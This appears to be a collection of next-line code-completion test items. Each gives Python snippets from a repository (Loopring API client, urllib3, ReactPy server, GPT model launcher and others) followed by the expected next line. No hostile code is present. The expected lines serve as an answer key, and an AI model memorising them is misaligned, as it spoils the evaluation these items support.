EasyDict() self.cuda = cuda if yaml_list is not None: for yaml_path in yaml_list: with open(yaml_path, 'r') as stream: config = yaml.safe_load(stream) self.add_kwargs(**config) self.add_kwargs(**kwargs) self.config = EasyDict(dict(sorted(self.config.items()))) def add_kwargs(self, **kwargs): for k, v in kwargs.items(): if v == '': continue self.config[k] = v def get_config(self, for_path=False, *args, **kwargs): config = '' for k, val in self.config.items(): if isinstance(val, bool): if val: config += ' --{}'.format(k) elif isinstance(val, str) and (len(val.split('\\')) > 1 or len(val.split('/')) > 1): if for_path: config += ' --{} {}'.format( k, os.path.join(*val.replace('\\', '/').split('/')[-1:]).replace('/', '@')[:8], ) else: config += ' --{} \"{}\"'.format(k, val) else: config += ' --{} {}'.format(k, val) return config def get_name(self, *args, **kwargs): return "{}".format(self.get_config(for_path=True)) def show_config(self): print(self.config) # print(self.config.setup) # print(self.config.backbone) # print(self.config.model_kwargs) # print(self.config.model_kwargs.head) # Path: _AutoLauncher.py import time from _MainLauncher import path_operator from _Utils import Launcher from _Utils.ConfigOperator import ConfigOperator def main(): class C2(ConfigOperator): def get_name(self, *args, **kwargs): return '_QueueLog'
Launcher.Launcher(
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: precisionalgorithms/loopring-python-SDK # Path: loopring/session.py class Session: """ Parent class for Loopring API. """ # Class variables api_key = None account_id = None headers = None base_url = 'https://api3.loopring.io/api/v3' @classmethod def initialize(cls): """ Initialize the Loopring API with API key and account ID. """ load_dotenv() cls.api_key = os.environ.get("API_KEY") cls.account_id = os.environ.get("ACCOUNT_ID") cls.headers = { 'Accept': 'application/json', 'X-API-KEY': cls.api_key } # Path: loopring/account.py class Account(Session): def get_account_balances( self, address: str = "", tokens: str = "" ) -> list[Balance]: """ Get the balances for the account associated with the API key. :param address: Address of the account to fetch balances for. :param tokens: List of token IDs to fetch balances for. :return: Dataclass. """ url = (f'{self.base_url}/user/balances?accountId={self.account_id}' f'&address={address}&tokens={tokens}') response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [Balance(**entry) for entry in data] else: print("Error fetching account balance:", response.status_code) return response.json() # Path: loopring/exchange.py class Exchange(Session): def get_tokens(self) -> list[TokenInfo]: """ Get the tokens supported by the Loopring protocol. :return: List of tokens. """ url = f'{self.base_url}/exchange/tokens' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [TokenInfo(**entry) for entry in data] else: print("Error fetching tokens:", response.status_code) return response.json() def get_exchange_info(self) -> ExchangeInfo: """ Get the exchange info. :return: Exchange Info. """ url = f'{self.base_url}/exchange/info' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return ExchangeInfo(**data) else: print("Error fetching tokens:", response.status_code) return response.json() def get_markets(self) -> list[MarketInfo]: """ Get the markets supported by the Loopring protocol. :return: List of markets. """ url = f'{self.base_url}/exchange/markets' response = requests.get(url, headers=self.headers) if response.status_code == 200: data = response.json() return [MarketInfo(**entry) for entry in data['markets']] else: print("Error fetching markets:", response.status_code) return response.json() # Path: utils.py def join_balance_with_token_info( balances: List[Balance], tokens: List[TokenInfo] ) -> list[DetailedBalance]: """ Join the Balance dataclass with the TokenInfo dataclass. """ token_info_map = {token.tokenId: token for token in tokens} joined_data = [] for balance in balances: token_info = token_info_map.get(balance.tokenId) if token_info: combined_data = { 'accountId': balance.accountId, 'tokenId': balance.tokenId, 'total': balance.total, 'converted_total': convert_from_wei(balance.total, token_info.decimals), 'locked': balance.locked, 'pending': balance.pending, 'symbol': token_info.symbol, 'name': token_info.name, 'address': token_info.address, 'decimals': token_info.decimals } joined_data.append(combined_data) return [DetailedBalance(**entry) for entry in joined_data] # Path: main.py import pickle from loopring.session import Session from loopring.account import Account from loopring.exchange import Exchange from utils import join_balance_with_token_info # Initialize the Loopring API with API key and account ID Session.initialize() # Get the account balances account = Account() balances = account.get_account_balances() # Get token info on exchange
exchange = Exchange()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Liyulingyue/ModulelyTools # Path: codes/extraction/ipynb/ipynb_analyse.py def parse_ipynb(file_path): """ # 示例:使用函数解析一个ipynb文件 file_path = 'main.ipynb' # 请将此处替换为您的ipynb文件路径 result = parse_ipynb(file_path) print(result) """ # 读取ipynb文件 with open(file_path, 'r', encoding='utf-8') as f: nb = nbformat.read(f, as_version=4) # 初始化结果列表 parsed_cells = [] # 对每一个cell进行处理 for cell in nb.cells: cell_dict = {} if cell.cell_type == 'markdown': cell_dict['属性'] = 'Markdown' cell_dict['内容'] = cell.source cell_dict['输出'] = '' elif cell.cell_type == 'code': cell_dict['属性'] = 'Code' cell_dict['内容'] = cell.source cell_dict['输出'] = '' else: raise ValueError(f"Unsupported cell type: {cell.cell_type}") parsed_cells.append(cell_dict) return parsed_cells # Path: codes/extraction/ipynb/ipynb_analyse.py def get_ipynb_content(parsed_cells): ipynb_content = "" for i in range(len(parsed_cells)): if parsed_cells[i]['属性'] == "Code": ipynb_content += f"[Cell No. {i}]\n {parsed_cells[i]['内容']}\n\n" return ipynb_content # Path: codes/extraction/ipynb/ipynb_analyse.py def get_model_list(ipynb_content, llm): prompt = \ f""" 我将给你一些NoteBook中的测试代码,请你阅读这些代码,并根据代码内容进行架构设计,使用json格式返回设计结果。 NoteBook中的代码是{ipynb_content} Json返回的内容格式为: {str('{')} "模块":list[dict{str('{')}"Name":str, "Type":str, "Introduction":str{str('}')}] {str('}')} “模块”信息是一个list,每个元素是一个字典,包括了模块名称,模块类型(取值为"class"或"function"),模块介绍 """ json_data = llm.get_llm_json_answer(prompt) return json_data["模块"] # Path: codes/extraction/ipynb/ipynb_analyse.py def model_list2python(model_list, ipynb_content, llm): py_str = "" for model_dict in model_list: model_name = model_dict["Name"] model_type = model_dict["Type"] model_intro = model_dict["Introduction"] prompt = \ f""" 我将给你一个模块名称和模块类型,以及一些Notebook中的测试代码,并根据代码内容实现这个模块,使用json格式返回设计结果。 模块名称是{model_name},请定义为一个{model_type},模块的功能是{model_intro},NoteBook中的代码是{ipynb_content}。 Json返回的内容格式为: {str('{')} "代码":multi-lines str {str('}')} “代码”信息是一个多行字符串,内容是你根据NoteBook中的代码和模块的功能,对模块{model_name}的程序实现,请保证生成的代码可以直接运行,解释说明的内容采用注释标记。 """ # model_impl = get_llm_json_answer(prompt) try: model_impl = llm.get_llm_json_answer(prompt) py_str += model_impl["代码"] except: py_str += f"# 模块{model_name},类型是{model_type},生成失败" py_str += "\n\n" return py_str # Path: codes/extraction/py/py_analyse.py def extract_function_defs(node, function_defs): if isinstance(node, ast.FunctionDef): function_source = ast.unparse(node) function_defs.append([node.name, function_source, [arg.arg for arg in node.args.args], ast.get_docstring(node)]) elif isinstance(node, ast.ClassDef): function_source = ast.unparse(node) function_defs.append([node.name, function_source, [stmt.name for stmt in node.body if isinstance(stmt, ast.FunctionDef)], ast.get_docstring(node)]) else: for child in ast.iter_child_nodes(node): extract_function_defs(child, function_defs) # Path: codes/extraction/py/py_analyse.py def get_function_defs(code): tree = ast.parse(code) function_defs = [] extract_function_defs(tree, function_defs) return function_defs # a list, each element is [define of function/class, docstring] # Path: codes/extraction/py/py_analyse.py def get_intro_of_fun(fun_str, llm): try: prompt = f""" 请帮我为这个函数或者类写一段说明介绍,并且以json的形式返回给我。 需要解读的函数或者类是{fun_str} Json返回的内容格式为: {str('{')}" "说明介绍":str {str('}')} """ result = llm.get_llm_answer(prompt) try: json_dict = llm.extract_json_from_llm_answer(result) return json_dict["说明介绍"] except: return result except: return "输出失败" # Path: codes/extraction/ModuleTools.py from .ipynb.ipynb_analyse import parse_ipynb, get_ipynb_content, get_model_list, model_list2python from .py.py_analyse import extract_function_defs, get_function_defs, get_intro_of_fun from ..llm.Ernie import Ernie from ..llm.Ernie import Ernie class ModuleTools(object): def __init__(self, llm_type="Ernie"): super.__init__() if llm_type=="Ernie": self.llm = Ernie() else: # default set ernie as used llm self.llm = Ernie() def ipynb2py(self, ipynb_path = "example.ipynb", prompt = ""):
result = parse_ipynb(ipynb_path)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Azure-Samples/functions-python-web-crawler # Path: .venv/Lib/site-packages/urllib3/util/connection.py _TYPE_SOCKET_OPTIONS = typing.Sequence[typing.Tuple[int, int, typing.Union[int, bytes]]] # Path: .venv/Lib/site-packages/urllib3/util/timeout.py _DEFAULT_TIMEOUT: Final[_TYPE_DEFAULT] = _TYPE_DEFAULT.token # Path: .venv/Lib/site-packages/urllib3/util/timeout.py _TYPE_TIMEOUT = typing.Optional[typing.Union[float, _TYPE_DEFAULT]] # Path: .venv/Lib/site-packages/urllib3/util/url.py class Url( typing.NamedTuple( "Url", [ ("scheme", typing.Optional[str]), ("auth", typing.Optional[str]), ("host", typing.Optional[str]), ("port", typing.Optional[int]), ("path", typing.Optional[str]), ("query", typing.Optional[str]), ("fragment", typing.Optional[str]), ], ) ): """ Data structure for representing an HTTP URL. Used as a return value for :func:`parse_url`. Both the scheme and host are normalized as they are both case-insensitive according to RFC 3986. """ def __new__( # type: ignore[no-untyped-def] cls, scheme: str | None = None, auth: str | None = None, host: str | None = None, port: int | None = None, path: str | None = None, query: str | None = None, fragment: str | None = None, ): if path and not path.startswith("/"): path = "/" + path if scheme is not None: scheme = scheme.lower() return super().__new__(cls, scheme, auth, host, port, path, query, fragment) @property def hostname(self) -> str | None: """For backwards-compatibility with urlparse. We're nice like that.""" return self.host @property def request_uri(self) -> str: """Absolute path including the query string.""" uri = self.path or "/" if self.query is not None: uri += "?" + self.query return uri @property def authority(self) -> str | None: """ Authority component as defined in RFC 3986 3.2. This includes userinfo (auth), host and port. i.e. userinfo@host:port """ userinfo = self.auth netloc = self.netloc if netloc is None or userinfo is None: return netloc else: return f"{userinfo}@{netloc}" @property def netloc(self) -> str | None: """ Network location including host and port. If you need the equivalent of urllib.parse's ``netloc``, use the ``authority`` property instead. """ if self.host is None: return None if self.port: return f"{self.host}:{self.port}" return self.host @property def url(self) -> str: """ Convert self into a url This function should more or less round-trip with :func:`.parse_url`. The returned url may not be exactly the same as the url inputted to :func:`.parse_url`, but it should be equivalent by the RFC (e.g., urls with a blank port will have : removed). Example: .. code-block:: python import urllib3 U = urllib3.util.parse_url("https://google.com/mail/") print(U.url) # "https://google.com/mail/" print( urllib3.util.Url("https", "username:password", "host.com", 80, "/path", "query", "fragment" ).url ) # "https://username:[email protected]:80/path?query#fragment" """ scheme, auth, host, port, path, query, fragment = self url = "" # We use "is not None" we want things to happen with empty strings (or 0 port) if scheme is not None: url += scheme + "://" if auth is not None: url += auth + "@" if host is not None: url += host if port is not None: url += ":" + str(port) if path is not None: url += path if query is not None: url += "?" + query if fragment is not None: url += "#" + fragment return url def __str__(self) -> str: return self.url # Path: .venv/Lib/site-packages/urllib3/_base_connection.py import typing import ssl from .util.connection import _TYPE_SOCKET_OPTIONS from .util.timeout import _DEFAULT_TIMEOUT, _TYPE_TIMEOUT from .util.url import Url from typing import Literal, Protocol from .response import BaseHTTPResponse from __future__ import annotations _TYPE_BODY = typing.Union[bytes, typing.IO[typing.Any], typing.Iterable[bytes], str] class ProxyConfig(typing.NamedTuple): ssl_context: ssl.SSLContext | None use_forwarding_for_https: bool assert_hostname: None | str | Literal[False] assert_fingerprint: str | None class _ResponseOptions(typing.NamedTuple): # TODO: Remove this in favor of a better # HTTP request/response lifecycle tracking. request_method: str request_url: str preload_content: bool decode_content: bool enforce_content_length: bool if typing.TYPE_CHECKING: class BaseHTTPConnection(Protocol): default_port: typing.ClassVar[int] default_socket_options: typing.ClassVar[_TYPE_SOCKET_OPTIONS] host: str port: int timeout: None | ( float ) # Instance doesn't store _DEFAULT_TIMEOUT, must be resolved. blocksize: int source_address: tuple[str, int] | None socket_options: _TYPE_SOCKET_OPTIONS | None
proxy: Url | None
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: neuroglia-io/python-framework # Path: tests/services.py class FileLogger(LoggerBase): def log(text: str): with open('example.txt', 'a') as file: file.write(f'{text}\n') # Path: tests/services.py class LoggerBase(ABC): @abstractclassmethod def log(text: str): raise NotImplementedError() # Path: tests/services.py class NullLogger(LoggerBase): def log(text: str): pass # Path: tests/services.py class PrintLogger(LoggerBase): def log(text: str): print(text) # Path: tests/cases/test_service_provider.py from re import T from sys import implementation from neuroglia.dependency_injection.service_provider import IServiceProvider, ServiceCollection, ServiceProvider from tests.services import FileLogger, LoggerBase, NullLogger, PrintLogger import pytest class TestServiceProvider: def test_build_should_work(self): #arrange services = ServiceCollection() services.add_singleton(LoggerBase, PrintLogger) services.add_singleton(LoggerBase, singleton = FileLogger()) services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger) #act service_provider = services.build() #assert assert service_provider is not None, 'service_provider is none' def test_get_service_should_work(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_singleton(LoggerBase, implementation_type) service_provider = services.build() #act logger = service_provider.get_service(LoggerBase) #assert assert logger is not None, 'logger is none' assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'" def test_get_unregistered_service_should_work(self): #arrange services = ServiceCollection() service_provider = services.build() #act logger = service_provider.get_service(LoggerBase) #assert assert logger is None, 'logger is not none' def test_get_required_service_should_work(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_singleton(LoggerBase, implementation_type) service_provider = services.build() #act logger = service_provider.get_required_service(LoggerBase) #assert assert logger is not None, 'logger is none' assert isinstance(logger, implementation_type), f"logger is not of expected type '{implementation_type.__name__}'" def test_get_required_unregistered_service_should_raise_error(self): #arrange services = ServiceCollection() service_provider = services.build() #assert with pytest.raises(Exception): service_provider.get_required_service(LoggerBase)() def test_get_scoped_service_from_root_should_raise_error(self): #arrange services = ServiceCollection() implementation_type = PrintLogger services.add_scoped(LoggerBase, implementation_type) service_provider = services.build() #assert with pytest.raises(Exception): service_provider.get_required_service(LoggerBase)() def test_get_services_should_work(self): #arrange services = ServiceCollection() services.add_singleton(LoggerBase, PrintLogger) services.add_singleton(LoggerBase, singleton = FileLogger()) services.add_singleton(LoggerBase, implementation_factory = self._build_null_logger) service_provider = services.build() #act loggers = service_provider.get_services(LoggerBase) #assert assert len(loggers) == 3, f'expected 3 loggers, got {len(loggers)}' def test_create_scope_should_work(self): pass def test_get_scoped_service_should_work(self): pass
def _build_null_logger(self, provider : IServiceProvider) -> NullLogger: return NullLogger()
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: Vlodson/Faculty-Choice-Assistant # Path: backend/llm/threads.py def make_thread_for_user() -> Thread: return CLIENT.beta.threads.create() # Path: backend/llm/threads.py def retrieve_thread_for_user(thread_id: str) -> Thread: return CLIENT.beta.threads.retrieve(thread_id=thread_id) # Path: backend/llm/threads.py def send_setup_message(thread: Thread) -> ThreadMessage: msg = ( "The file ontology.ttl has an RDF ontology in turtle syntax. " + "Please review the contents of the file. " + "After that each prompt will ask you to create a SPARQL query for a certain question, " + "using ONLY information from ontology.ttl. " + "Always add: PREFIX edu: <YOUR_ONTOLOGY.TTL_PATH_HERE> to your queries" ) return CLIENT.beta.threads.messages.create( thread_id=thread.id, role="user", content=msg ) # Path: backend/llm/threads.py def send_user_message(thread: Thread, msg: str) -> ThreadMessage: return CLIENT.beta.threads.messages.create( thread_id=thread.id, role="user", content=__contextualize_user_message(msg) ) # Path: backend/llm/threads.py def create_run_for_thread(thread: Thread, run: Optional[Run] = None) -> Run: if not run: return CLIENT.beta.threads.runs.create( thread_id=thread.id, assistant_id=ASSISTANT.id ) run_info = retrieve_run_for_user(run_id=run.id, thread_id=thread.id) while run.status != "completed": run_info = retrieve_run_for_user(run_id=run_info.id, thread_id=thread.id) return CLIENT.beta.threads.runs.create( thread_id=thread.id, assistant_id=ASSISTANT.id ) # Path: backend/llm/threads.py def retrieve_run_for_user(run_id: str, thread_id: str) -> Run: return CLIENT.beta.threads.runs.retrieve(run_id=run_id, thread_id=thread_id) # Path: backend/llm/threads.py def get_last_message(thread: Thread, run: Run) -> ThreadMessage: # wait untill the message is done writing # this does not have any fail exits run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id) while run_info.status != "completed": run_info = CLIENT.beta.threads.runs.retrieve(run_id=run.id, thread_id=thread.id) return list(msg for msg in CLIENT.beta.threads.messages.list(thread.id))[0] # Path: backend/llm/threads.py def get_query_from_message(msg: ThreadMessage) -> Optional[str]: raw_msg = msg.content[0].text.value start_delim = r"```sparql" end_delim = r"```" start_index = raw_msg.find(start_delim) end_index = raw_msg.find(end_delim, start_index + len(start_delim)) if start_index != -1 and end_index != -1: return raw_msg[start_index + len(start_delim) : end_index] return None # Path: backend/ontology/queries.py def apply_query(query: str) -> Result: return GRAPH.query(query_object=query) # Path: backend/ontology/queries.py def query_results_to_table(results: Result) -> Dict: return { __readable_property_name(str(key)): [ __clean_property_value(str(row[key])) for row in results ] for key in results.__dict__["vars"] } # Path: backend/server/endpoints/custom_types.py class SendMessageRequest(TypedDict): thread_id: str run_id: str msg: str # Path: backend/server/endpoints/custom_types.py class SetupUserResponse(TypedDict): thread_id: str run_id: str # Path: backend/server/endpoints/natural_language.py from flask import Blueprint, abort, request, jsonify from backend.llm.threads import ( make_thread_for_user, retrieve_thread_for_user, send_setup_message, send_user_message, create_run_for_thread, retrieve_run_for_user, get_last_message, get_query_from_message, ) from backend.ontology.queries import apply_query, query_results_to_table from backend.server.endpoints.custom_types import SendMessageRequest, SetupUserResponse bp = Blueprint("llm", __name__) @bp.route("/setup", methods=["GET"]) def setup_user() -> SetupUserResponse: thread = make_thread_for_user() _ = send_setup_message(thread)
run = create_run_for_thread(thread) # for easier expansion of the API
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: stevej2608/reactpy-apexcharts # Path: utils/logger.py # Path: utils/var_name.py def var_name(obj: Any, namespace: Dict[str, Any]) -> str: """Return var name as a string Args: obj (Any): Variable ty be named namespace (Dict[str, Any]): _description_ Returns: str: The objects name Usage: ``` from utils.var_name import var_name app = FastAPI(...) app_name = var_name(app, globals()) ``` """ return [name for name in namespace if namespace[name] is obj][0] # Path: utils/fast_server_options.py DEFAULT_OPTIONS=Options( head=html.head( html.meta(META_VIEWPORT), html.meta(META_COLOR), html.title(PAGE_HEADER_TITLE), ) ) # Path: utils/fast_server.py from typing import Callable from fastapi import FastAPI from reactpy.core.component import Component from reactpy.backend.fastapi import configure, Options from .logger import log, logging from .var_name import var_name from .fast_server_options import DEFAULT_OPTIONS import sys import signal import multiprocessing import uvicorn app = FastAPI(description="ReactPy", version="0.1.0") LOGS = [ "asgi-logger", "concurrent.futures", "concurrent", "asyncio", "uvicorn.error", "uvicorn", "watchfiles.watcher", "watchfiles", "watchfiles.main", "fastapi", "reactpy.backend", "reactpy", "reactpy._option", "reactpy.core.hooks", "reactpy.core", "urllib3.util.retry", "urllib3.util", "urllib3", "urllib3.connection", "urllib3.response", "urllib3.connectionpool", "urllib3.poolmanager", "charset_normalizer", "requests", "reactpy.web.utils", "reactpy.web", "reactpy.web.module", "reactpy.backend.utils", "reactpy.core.layout", "reactpy.core.serve", "reactpy.backend.starlette", "uvicorn.access", "starlette", ] def disable_noisy_logs(): # Turn off noisy logging for log_id in LOGS: _log = logging.getLogger(log_id) _log.setLevel(logging.ERROR) def handler(signum, frame): active = multiprocessing.active_children() for child in active: child.terminate() def run(AppMain: Callable[[], Component], options:Options=DEFAULT_OPTIONS, host='127.0.0.1', port=8000, disable_server_logs=False, **kwargs) -> None: """Called once to run reactpy application on the fastapi server Args: AppMain (Callable[[], Component]): Function that returns a reactpy Component options (Options, optional): Server options. Defaults to DASHBOARD_OPTIONS. Usage: ``` @component def AppMain(): return html.h2('Hello from reactPy!') ) run(AppMain, options=PICO_OPTIONS) ``` """ def _app_path(app: FastAPI) -> str: app_str = var_name(app, globals()) return f"{__name__}:{app_str}" configure(app, AppMain, options=options) app_path = _app_path(app) @app.on_event('startup') async def fastapi_startup(): if disable_server_logs: disable_noisy_logs()
log.info("Uvicorn running on http://%s:%s (Press CTRL+C to quit)", host, port)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: ict-bigdatalab/RIGHT # Path: get_datasets.py def read_line_examples_from_file(data_path): sequence = [] with open(data_path, 'r', encoding='utf-8') as f: for line in f: line = line.strip("\n") if not line: continue sequence.append(line.strip()) return sequence # Path: eval_utils.py def f1(pre, rec): if pre == 0 and rec == 0: return 0.0 return 2 * pre * rec / (pre + rec) # Path: retrieval_analysis.py import json from get_datasets import read_line_examples_from_file from tqdm import tqdm from eval_utils import f1 def get_hashtag_list(dst): tags = dst.split('[SEP]') target = [] for j in range(len(tags)): tags[j] = tags[j].strip() if tags[j] != '': target.append(tags[j]) # if the dst is nothing if len(target) == 0: target.append('None') # statistic_hashtags(hashtags) return target def retrieval_analysis(src_path, label_path, rev_index_path, document_path, out_path): src_list = read_line_examples_from_file(src_path) dst_list = read_line_examples_from_file(label_path) document_list = read_line_examples_from_file(document_path) with open(rev_index_path, 'r', encoding='UTF-8') as fp: rev_index = json.load(fp) rev_dst = [[document_list[index] for index in rev_index[i]["index"]] for i in range(len(src_list))] with open(out_path, 'w', encoding='UTF-8') as fp: for i in tqdm(range(len(src_list))): line = str(i) + '\n' + src_list[i] + '\n' + dst_list[i] + '\n' for k in range(len(rev_dst[i])): line = line + str(rev_index[i]['score'][k]) + '\t' + rev_dst[i][k] + '\n' line += '\n' fp.write(line) def retrieval_hashtag_score_analysis(src_path, label_path, rev_index_path, document_path, top_k): src_list = read_line_examples_from_file(src_path) dst_list = read_line_examples_from_file(label_path) document_list = read_line_examples_from_file(document_path) with open(rev_index_path, 'r', encoding='UTF-8') as fp: rev_index = json.load(fp) rev_dst = [[get_hashtag_list(document_list[index]) for index in rev_index[i]["index"]] for i in range(len(src_list))] dst_list = [get_hashtag_list(dst) for dst in dst_list] total_p = 0 total_r = 0 true_num = 0 for i in tqdm(range(len(src_list))): label = dst_list[i] hashtag_score = dict() for k in range(len(rev_dst[i])): for rev_hashtag in rev_dst[i][k]: if rev_hashtag not in hashtag_score.keys(): hashtag_score[rev_hashtag] = 0 hashtag_score[rev_hashtag] += rev_index[i]['score'][k] hashtag_score = sorted(hashtag_score.items(), key=lambda x: x[1], reverse=True)[:top_k] total_p += len(hashtag_score) total_r += len(label) for rev_hashtag_pair in hashtag_score: for lab in label: if rev_hashtag_pair[0] == lab or rev_hashtag_pair[0] in lab or lab in rev_hashtag_pair[0]: true_num += 1 p = true_num / total_p r = true_num / total_r
f = f1(p, r)
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: shell-nlp/gpt_server # Path: gpt_server/utils.py def get_free_tcp_port(): """获取可用的端口""" tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) tcp.bind(("", 0)) _, port = tcp.getsockname() tcp.close() return port # Path: gpt_server/utils.py def start_server(host, port): """启动服务""" start_controller() start_openai_server(host, port) # Path: gpt_server/utils.py def run_cmd(cmd): print("执行命令命令如下:") print(cmd) # 执行 subprocess.run(cmd, shell=True) # Path: gpt_server/utils.py def stop_server(): """停止服务""" stop_fastchat = ( "ps -ef | grep fastchat.serve | awk '{print $2}' |xargs -I{} kill -9 {}" ) stop_gpt_server = ( "ps -ef | grep gpt_server | awk '{print $2}' |xargs -I{} kill -9 {}" ) run_cmd(stop_fastchat) run_cmd(stop_gpt_server) print("停止服务成功!") # Path: gpt_server/utils.py def delete_log(root_path): datanames = os.listdir(os.path.join(root_path, "serving")) # 查找本目录下所有文件 for dataname in datanames: if ( dataname.startswith("model_worker") or dataname.startswith("openai_api_server") or dataname.startswith("controller.log") ): # print(os.path.join(root_path,f"serving/{dataname}")) os.remove(os.path.join(root_path, f"serving/{dataname}")) # Path: gpt_server/serving/main.py import yaml import os import sys import subprocess import signal from pprint import pprint from multiprocessing import Process from gpt_server.utils import get_free_tcp_port, start_server, run_cmd, stop_server,delete_log # 配置根目录 root_dir = os.path.join(os.path.dirname(__file__), "..") root_dir = os.path.abspath(root_dir) sys.path.append(root_dir) # 删除日志 delete_log(root_dir) def signal_handler(signum, frame): stop_server() raise KeyboardInterrupt signal.signal(signal.SIGINT, signal_handler) with open("./config.yaml", "r") as f: config = yaml.safe_load(f) print(config) # ----------------------------启动 Controller 和 Openai API 服务---------------------------------------------------- host = config["serve_args"]["host"] port = config["serve_args"]["port"] start_server(host, port) # ----------------------------启动 Controller 和 Openai API 服务---------------------------------------------------- for model_name, model_config in config["models"].items(): # 启用的模型 if model_config["enable"]: pprint(model_config) print() # 模型地址 model_name_or_path = model_config["model_name_or_path"] # 模型类型 model_type = model_config["model_type"] # model type 校验 py_path = f"{root_dir}/model_worker/{model_type}.py" model_names = model_name if model_config["alias"]: model_names = model_name + "," + model_config["alias"] # 获取 worker 数目 并获取每个 worker 的资源 workers = model_config["workers"] # if model_config["work_mode"] == "deepspeed": # 设置使用 deepspeed process = [] for worker in workers: gpus = worker["gpus"] # 将gpus int ---> str gpus = [str(i) for i in gpus] gpus_str = ",".join(gpus) num_gpus = len(gpus) if model_config["work_mode"] == "deepspeed": os.environ["USE_DS"] = "1" run_mode = f"deepspeed --num_gpus {num_gpus} " pass elif model_config["work_mode"] == "accelerate": os.environ["USE_ACC"] = "1" os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str run_mode = "python " pass elif model_config["work_mode"] == "hf": os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str run_mode = "python " pass # DS 只能在代码内部起效 # os.environ["CUDA_VISIBLE_DEVICES"] = gpus_str cmd = ( run_mode + py_path + f" --gpus {gpus_str}"
+ f" --master_port {get_free_tcp_port()}"
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file. NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation. ====REPOSITORY==== # Repo Name: LLM-Evaluation-s-Always-Fatiguing/leaf-playground-hub # Path: rag_qa/rag_qa/agents/examiner.py class Examiner(SceneStaticAgent, role_definition=ROLE_DEFINITION, cls_description="An agent who minitor the examine"): config_cls = ExaminerConfig config: config_cls def __init__(self, config: config_cls): super().__init__(config=config) self._cur = 0 self._questions = [] self._dataset_config: DatasetConfig = None def prepare_questions( self, dataset_config: DatasetConfig, ) -> None: self._cur = 0 self._questions = prepare_dataset(dataset_config) self._dataset_config = dataset_config def send_question(self, receivers: List[Profile]) -> ExaminerQuestion: question = ExaminerQuestion( sender=self.profile, receivers=receivers, content=Text(text=self._questions[self._cur][self._dataset_config.question_column]), question_id=self._cur ) self._cur += 1 return question def check_examine_finish(self) -> bool: return self._cur >= len(self._questions) def get_golden_answer(self, question_id: int) -> Optional[dict]: result = {} if self._dataset_config.golden_answer_column: result['golden_answer'] = self._questions[question_id][self._dataset_config.golden_answer_column] if self._dataset_config.ground_truth_column: result['ground_truths'] = self._questions[question_id][self._dataset_config.ground_truth_column] return result # Path: rag_qa/rag_qa/agents/base_examinee.py class AIBaseExaminee(SceneAIAgent, ABC, role_definition=ROLE_DEFINITION): config_cls = AIBaseExamineeConfig config: config_cls @abstractmethod async def answer_question(self, question: ExaminerQuestion, examiner: Profile) -> ExamineeAnswer: pass # Path: rag_qa/rag_qa/dataset_utils.py class DatasetConfig(_Config): path: str = Field(default="explodinggradients/fiqa") split: str = Field(default="baseline") question_column: str = Field(default="question") golden_answer_column: str = Field(default="answer") ground_truth_column: str = Field(default="ground_truths") num_questions: int = Field(default=-1) filter_conditions: Optional[List[DynamicFn]] = Field(default=None) question_preprocessor: Optional[DynamicFn] = Field(default=None) name: Optional[str] = Field(default=None) data_dir: Optional[str] = Field(default=None) data_files: Optional[List[str]] = Field(default=None) def model_post_init(self, __context: Any) -> None: if self.num_questions < -1 or self.num_questions == 0: raise ValueError(f"num_questions should be -1 or positive, got {self.num_questions}") # Path: rag_qa/rag_qa/scene_definition.py def avg_fn(records: List[_RecordData]) -> AggregationMethodOutput: class ExaminerQuestion(TextMessage): class ExamineeAnswer(JsonMessage): SCENE_DEFINITION = SceneDefinition( name="RAG QA Examine", description="Retrieval Augmented Generation Question Answering Examine Scene. The evaluator powered by ragas.", roles=[ RoleDefinition( name="examiner", description="the one that participants in a rag based qa examine to monitor the examinees", num_agents_range=(1, 1), is_static=True, actions=[] ), RoleDefinition( name="examinee", description="the one that participants in a rag based qa examine to answer questions", num_agents_range=(1, -1), is_static=False, actions=[ ActionDefinition( name="answer_question", description="answering the question sent by examiner", signature=ActionSignatureDefinition( parameters=[ ActionSignatureParameterDefinition( name="question", annotation=ExaminerQuestion ), ActionSignatureParameterDefinition( name="examiner", annotation=Profile ) ], return_annotation=ExamineeAnswer, is_static_method=False ), metrics=MetricDefinitionList, ) ] ) ], env_vars=[] ) # Path: rag_qa/rag_qa/scene.py import asyncio from typing import List, Optional from pydantic import Field from leaf_playground.core.workers import Logger from leaf_playground.core.scene import 